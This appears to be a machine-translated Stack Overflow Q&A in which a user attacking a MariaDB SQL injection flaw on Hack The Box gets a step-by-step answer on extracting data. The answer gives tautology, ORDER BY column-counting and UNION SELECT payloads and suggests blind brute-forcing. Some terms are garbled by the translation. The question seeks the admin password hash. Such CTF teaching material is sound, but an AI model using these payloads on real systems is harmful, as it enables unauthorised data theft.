我正在尝试(合法地)利用带有 SQLi 漏洞的 MariaDb 数据库。
我已经确定了这里的漏洞....../?o=1&page=app
o=*
易受攻击并产生以下错误...DEBUG INFO: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '5' or dest like '1'') LIMIT 10' at line 1
我正在使用 Burp Suite 并找到了以下语法,它似乎更接近标记,但仍然产生语法错误。
我认为它更接近标记,因为错误只是吐出我介绍的查询而不是“额外”字段:'5' or dest like '1'') LIMIT 10'
.
我假设这是原始查询的一部分 1
包括在内,当我用其他保持真实的随机字符串进行测试时。
我从页面线索中知道的管理员密码哈希是 uid 1
.
这个查询我缺少什么?SELECT Password FROM mysql.user WHERE (uid = '1' or dest like '%')-- ') LIMIT 10
编辑:这是在 Hack The Box 上完成的,所以不会发生令人讨厌的非法事情。
最佳答案
EDIT: This is being done on Hack The Box so no nasty illegal stuff going on.
好的,让我们玩得开心。
当我查看错误消息时
DEBUG INFO: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '5' or dest like
'1'') LIMIT 10'
at line 1
我假设应用程序中的查询和代码或多或少类似于这个伪明智的
@o
实际上是一个 MySQL 用户变量..SELECT
*
FROM
DUMMY_TABLE
WHERE
DUMMY_TABLE.o = '",@o,"'
LIMIT 10
我将使用 SQL fiddle space模拟 SQL 注入(inject)测试和更多可能访问其他表。
您可以使用
1' OR 1 = 1#
测试您的注入(inject)。或 1' OR 1 = 1--
当您使用 1
时,两者都应该工作并且应该给您相同的结果作为输入。这是因为 MariaDB 自动为您可能需要使用更严格版本的其他数据库转换类型
1' OR '1' = '1#
应该生成哪个
SELECT * FROM DUMMY_TABLE WHERE DUMMY_TABLE.o = '1' OR 1 = 1#' LIMIT 10
或者
SELECT * FROM DUMMY_TABLE WHERE DUMMY_TABLE.o = '1' OR 1 = 1--' LIMIT 10
然后因为您在应用程序中看到错误,您可以使用
ORDER BY 1
检查选择了多少列并增加数字,直到出现错误。错误:ER_BAD_FIELD_ERROR:“订单子(monad)句”中的未知列“2”
注入(inject)
1' ORDER BY 1#
或 1' ORDER BY 1--
这意味着对结果集中的第一列进行排序 不是 排序
1
文字。生成
SELECT * FROM DUMMY_TABLE WHERE DUMMY_TABLE.o = '1' ORDER BY 1#' LIMIT 10
或者
SELECT * FROM DUMMY_TABLE WHERE DUMMY_TABLE.o = '1' ORDER BY 1--' LIMIT 10
当您知道列时,您可以使用
UNION
进入其他表。使用NULL
如果您不需要所有列。注入(inject)
1' UNION ALL SELECT NULL FROM DUAL#
请注意
DUAL
是 MariaDB、MySQL 和 Oracle 中的“虚拟”非现有表,如果您可以查询此“表”,则意味着您在技术上也可以进入其他表。生成的 SQL
SELECT * FROM DUMMY_TABLE WHERE DUMMY_TABLE.o = '1' UNION ALL SELECT NULL FROM DUAL#' LIMIT 10
如果网页设计为“详细”页面,其中一条记录始终可见,您需要添加
LIMIT 1, 1
在你的注入(inject)。如果 Web 应用程序中没有可见的错误怎么办,您应该能够通过盲目的 SQL 注入(inject)来盲目地暴力破解并查看应用程序是如何工作的。
也可以试试
?o=0
, ?o=NULL
或非常高的数字,例如最大 INT 值(有符号)?o=2147483647
或(无符号)?o=4294967295
在尝试暴力破解使用的列号之前,您可以了解应用程序如何处理无法找到的记录。因为它不太可能有 id
0
或 INT
上的高数字数据类型,因为如果给出最后一个数字,应用程序将停止工作。如果您仍然获得具有这些高数字的记录,请使用
BIGINT
的最大值而是数据类型。对于第 1 列,相同的结果 ID
o=1
1' UNION ALL SELECT 1 FROM DUAL LIMIT 1, 1#
对于会出错的第 2 列,但很可能您会看到错误页面或未找到记录的消息。
或者一个甜蜜的 HTTP 404(未找到)错误状态。
1' UNION ALL SELECT 1 FROM DUAL LIMIT 1, 1#
使用
LIMIT
时可能遇到的一个问题不使用 ORDER BY
可能有机会获得相同的记录,因为 SQL 标准已定义 SQL 表/结果集是 无序不使用 ORDER BY
所以你最好继续使用
ORDER BY 1
在蛮力。1' UNION ALL SELECT 1 FROM DUAL ORDER BY 1 DESC#
和
1' UNION ALL SELECT 1 FROM DUAL ORDER BY 1 DESC LIMIT 1, 1#
数据库支持
ORDER BY 1
比我最初想的要好,因为它适用于 MySQL、MariaDB、SQL Server (MSSQL) 和 PostgreSQL。还有
ORDER BY 1
是 SQL 99 中删除的 SQL 92 功能。所以实际上 SQL 数据库不应该执行
ORDER BY 1
如果他们在这一点上遵循 SQL 标准,那就再好不过了。SQL 92 BNF
<sort specification list> ::=
<sort specification> [ { <comma> <sort specification> }... ]
<sort specification> ::=
<sort key> [ <collate clause > ] [ <ordering specification> ]
<sort key> ::=
<column name>
| <unsigned integer> # <- here it is
<ordering specification> ::= ASC | DESC
与 SQL 1999 BNF
<sort specification list> ::=
<sort specification> [ { <comma> <sort specification> }... ]
<sort specification> ::=
<sort key> [ <collate clause > ] [ <ordering specification> ]
<sort key> ::=
<column name>
# <- missing
<ordering specification> ::= ASC | DESC
关于mysql - MariaDb SQL 注入(inject),我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/54809948/